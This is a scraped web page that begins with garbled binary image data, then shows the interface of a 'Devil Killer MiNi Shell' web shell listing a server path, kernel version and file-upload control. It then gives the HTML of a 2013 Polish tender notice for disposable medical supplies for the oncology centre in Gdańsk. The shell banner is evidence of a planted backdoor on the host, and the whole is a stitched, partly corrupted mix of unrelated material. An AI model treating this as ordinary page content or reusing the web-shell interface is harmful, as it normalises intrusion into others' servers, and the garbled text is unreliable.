JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130620/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130620/237842-N-2013.html

<p class="kh_header"><b>Gdańsk: SUKCESYWNE DOSTAWY SPRZĘTU JEDNORAZOWEGO UŻYTKU Z PODZIAŁEM NA 29 PAKIETÓW NA POTRZEBY WOJEWÓDZKIEGO CENTRUM ONKOLOGII W GDAŃSKU</b><br>
<b>Numer ogłoszenia: 237842 - 2013; data zamieszczenia: 20.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzkie Centrum Onkologii Samodzielny Publiczny ZOZ , ul. M. Skłodowskiej-Curie 2, 80-210 Gdańsk, woj. pomorskie, tel. 058 3419348, faks 058 3419348.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wpo.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNE DOSTAWY SPRZĘTU JEDNORAZOWEGO UŻYTKU Z PODZIAŁEM NA 29 PAKIETÓW NA POTRZEBY WOJEWÓDZKIEGO CENTRUM ONKOLOGII W GDAŃSKU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> SUKCESYWNE DOSTAWY SPRZĘTU JEDNORAZOWEGO UŻYTKU Z PODZIAŁEM NA 29 PAKIETÓW NA POTRZEBY WOJEWÓDZKIEGO CENTRUM ONKOLOGII w GDAŃSKU:Pakiet nr 1: SZWY NIEWCHŁANIALNE - wykonane z włókna poliamidowego 			
Pakiet nr 2 SZWY WCHŁANIALNE		
Pakiet nr 3 MATERIAŁY JEDNORAZOWE			
Pakiet nr 4 MATERIAŁY FIZELINOWE		
Pakiet nr 5 ŚRODKI OPATRUNKOWE			
Pakiet nr 6 WKŁADY			
Pakiet nr 7 PAPIER DO USG I EKG, ELEKTRODY DO EKG		
Pakiet nr 8 OSTRZA			
Pakiet nr 9 SZPATUŁKI, WZIERNIKI			
Pakiet nr 9A ENDOSAMPLER			
Pakiet nr 10 RĘKAWICE NIEJAŁOWE		
Pakiet nr 11 RĘKAWICE JAŁOWE			
Pakiet nr 12 POJEMNIKI NA ZUŻYTE IGŁY			
Pakiet nr 13 WSKAŹNIK PARA WODNA			
Pakiet nr 14 IGŁY, STRZYKAWKI			
Pakiet nr 15 IGŁY DO PORTÓW NACZYNIOWYCH			
Pakiet nr 16 KANIULE			
Pakiet nr 17 IGŁY DO BIOPSJI SZPIKU I TREPANOBIOPSJI			
Pakiet nr 18 PŁYTKI DO KOAGULACJI			
Pakiet nr 19 ŻEL DO USG			
Pakiet nr 20 TEST UREAZOWY			
Pakiet nr 21 USTNIKI, PĘTLE DO POLIPEKTOMII 			
Pakiet nr 22 TUBUSY - końcówki do rektoskopu			
Pakiet nr 23 SPRZĘT DO LABORATORIUM			
Pakiet nr 24 SPRZĘT DO PRACY Z CYTOSTATYKAMI			
Pakiet nr 25 MASKI OCHRONNE DLA CYTOSTATYKÓW			
Pakiet nr 26 RĘKAWICE DO PRACY Z CYTOSTATYKAMI			
Pakiet nr 27 NFUZORY			
Pakiet nr 28 PŁYNY INFUZYJNE (pakiet nr 9A jest pakietem nr 29z uwagi na faktyczną liczbę pakietów)).</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 29.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek udziału w postępowaniu za spełniony, jeżeli przepisy prawa nakładają obowiązek ich posiadania za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek udziału w postępowaniu dot. posiadania wiedzy i doświadczenia za spełniony, jeżeli Wykonawca wykaże należyte wykonanie co najmniej jednej dostawy sprzętu jednorazowego użytku lub materiałów medycznych o wartości brutto: 
	nie mniejszej niż -  700 000,00 zł w przypadku składania oferty na całość zamówienia (Pakiety nr 1-28),
	nie mniejszej niż - 2 500,00 zł      -   Pakiet 1
	nie mniejszej niż -  7 900,00  zł    -   Pakiet 2,
	nie mniejszej niż - 38 000,00 zł    -   Pakiet 3,
	nie mniejszej niż - 64 000,00 zł    -   Pakiet 4,
	nie mniejszej niż - 25 000,00 zł    -   Pakiet 5,
	nie mniejszej niż - 400,00   zł        -  Pakiet 6,
	nie mniejszej niż - 4 800,00 zł       -  Pakiet 7,
	nie mniejszej niż - 800,00   zł         - Pakiet 8,
	nie mniejszej niż - 5 000,00 zł         -Pakiet 9,
	nie mniejszej niż -  3 000,00 zł        - Pakiet 9A
	nie mniejszej niż - 44 000,00 zł       -Pakiet 10
	nie mniejszej niż - 10 000,00 zł      - Pakiet 11
	nie mniejszej niż - 4 000,00             -Pakiet 12,
	nie mniejszej niż - 1 400,00    zł      -Pakiet 13,
	nie mniejszej niż - 50 000,00 zł      - Pakiet 14
	nie mniejszej niż - 55 000,00 zł       -Pakiet 15,
	nie mniejszej niż - 36 000,00 zł         -Pakiet 16,
	nie mniejszej niż - 26 000,00 zł      - Pakiet 17,
	nie mniejszej niż - 1 000,00 zł         -Pakiet 18,
	nie mniejszej niż - 900,00 zł            -Pakiet 19
	nie mniejszej niż - 800,00 zł            -Pakiet 20,
	nie mniejszej niż - 16 000,00 zł      - Pakiet 21
	nie mniejszej niż - 4 800,00 zł        - Pakiet 22
	nie mniejszej niż - 56 000,00 zł    -   Pakiet 23
	nie mniejszej niż - 81 000,00 zł    -   Pakiet 24
	nie mniejszej niż - 16 000,00   zł     - Pakiet 25
	nie mniejszej niż - 16 000,00 zł     -  Pakiet 26
	nie mniejszej niż - 189 000,00 zł     -Pakiet 27
nie mniejszej niż - 84 000,00 zł       -Pakiet 28



Wartość wykonanych dostaw (zamówień) dla poszczególnych pakietów nie może być  mniejsza, niż wskazana powyżej. Wykonawca składający ofertę w kilku pakietach ,może wykazać wykonanie jednej dostawy, pod warunkiem, że jej wartość będzie nie mniejsza niż suma wartości określonych przez Zamawiającego dla poszczególnych pakietów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek udziału w postępowaniu za spełniony, jeżeli przepisy prawa nakładają obowiązek ich posiadania za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek udziału w postępowaniu za spełniony, jeżeli przepisy prawa nakładają obowiązek ich posiadania za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek udziału w postępowaniu dot. sytuacji ekonomicznej i finansowej za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków  art. 22 ust. 1 ustawy Pzp.  oraz wykaże , że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia poprzez posiadanie opłaconej polisy OC, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności  cywilnej na kwotę nie niższą, niż wartość niniejszego zamówienia tj. nie niższą od kwoty 700 000,00 zł (w odniesieniu do całego przedmiotu zamówienia i składaniu oferty na całość zamówienia)) oraz    w odniesieniu do wybranych pakietów:
1)	Pakiet nr  3-    30 000,00 zł
2)	Pakiet nr 4 -   60 000,00 zł
3)	Pakiet nr 5 -   20 000,00 zł
4)	Pakiet nr 10 - 40 000,00 zł
5)	Pakiet nr 14 - 45 000,00 zł
6)	Pakiet nr 15 - 50 000,00 zł
7)	Pakiet nt 16 - 36 000,00 zł
8)	Pakiet nr 17 - 35 000,00 zł
9)	Pakiet nr 23 - 50 000,00 zł
10)	Pakiet nr 24 - 80 000,00 zł
11)	Pakiet nr 27 - 180 000,00 zł
12)	Pakiet nr 28 - 80 000 ,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane  należycie, którymi to dowodami  są:

a) poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw poświadczenie
powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
11)	w przypadku zamówień na dostawy- oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a).

Uwaga: Wykonawcy składający ofertę wspólną przedkładają jeden wspólny wykaz oraz dokumenty potwierdzające, że te dostawy zostały wykonane należycie.;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	Oświadczenie o oferowanym urządzeniu - wg wzoru stanowiącego zał. nr 7 do SIWZ.

2.	Dokumenty potwierdzające, że oferowane urządzenie jest dopuszczone do obrotu i stosowania, zgodnie z ustawą o wyrobach medycznych z dnia 20 maja 2010 r. t.j. Dz. U. z 2010 r. Nr 107, poz. 679 oraz aktami wykonawczymi do niej - deklaracje zgodności CE, certyfikaty lub dokumenty potwierdzające zgłoszenie do rejestru w Urzędzie Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wykaz części zamówienia, których wykonanie zamierza się powierzyć podwykonawcom, wg wzoru stanowiącego zał. nr 9 do SIWZ (jeżeli dotyczy).
2.	Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (jeżeli dotyczy).
3.	Pełnomocnictwo potwierdzające posiadanie uprawnień osoby osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych 
4.	W przypadku spółki cywilnej - pisemne pełnomocnictwo uprawniające jednego ze wspólników do występowania w imieniu wszystkich wspólników w przeprowadzonym postępowaniu.
5.	W przypadku konsorcjum - należy podać informacje o wszystkich podmiotach wchodzących w skład konsorcjum i załączyć dokument, w który wszyscy wykonawcy wchodzący w skład konsorcjum ustanawiają pełnomocnika do reprezentacji.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - jakość - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach. W takim wypadku Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy.
2.	Zmiany istotnych postanowień zawartej umowy wymagają formy pisemnej pod rygorem nieważności i będą dopuszczalne wyłącznie w granicach unormowanych art. 144 ustawy Prawo zamówień publicznych.
3.	Zamawiający dopuszcza wprowadzenie zmian do umowy w następujących okolicznościach:
a)	zmiana terminu wykonania zamówienia, w przypadku zaistnienia okoliczności, których Strony umowy nie mogły przewidzieć w dniu jej zawarcia (np. okoliczności wynikające z działania siły wyższej);
b)	wydłużenie terminu wykonania zamówienia, w przypadku niewykorzystania ilościowego przedmiotu umowy, z  zastrzeżeniem § 2 ust. 2;
c)	zmniejszenie wynagrodzenia, w przypadku obniżenia przez Wykonawcę ceny przedmiotu umowy;
d)	zmiany warunków płatności na bardziej korzystne dla Zamawiającego (np. terminu płatności, na system ratalny); 
e)	zamiana produktu (np. na towar innego producenta) przy zachowaniu tożsamości jego parametrów i właściwości, w przypadku niedostępności na rynku spowodowanej np. zaprzestaniem produkcji.;
f)	zmiana ceny w przypadku zmiany cen urzędowych, z dniem wejścia w życie odpowiednich przepisów  prawnych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wco.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzkie Centrum Onkologii SP ZOZ,					                  80-210 Gdańsk, ul. M. Skłodowskiej-Curie 2, 					         (Komórka Zamówień Publicznych pok.35).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2013 godzina 12:30, miejsce: Wojewódzkie Centrum Onkologii SP ZOZ,					                  80-210 Gdańsk, ul. M. Skłodowskiej-Curie 2, 					         (Sekretariat pok.39).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




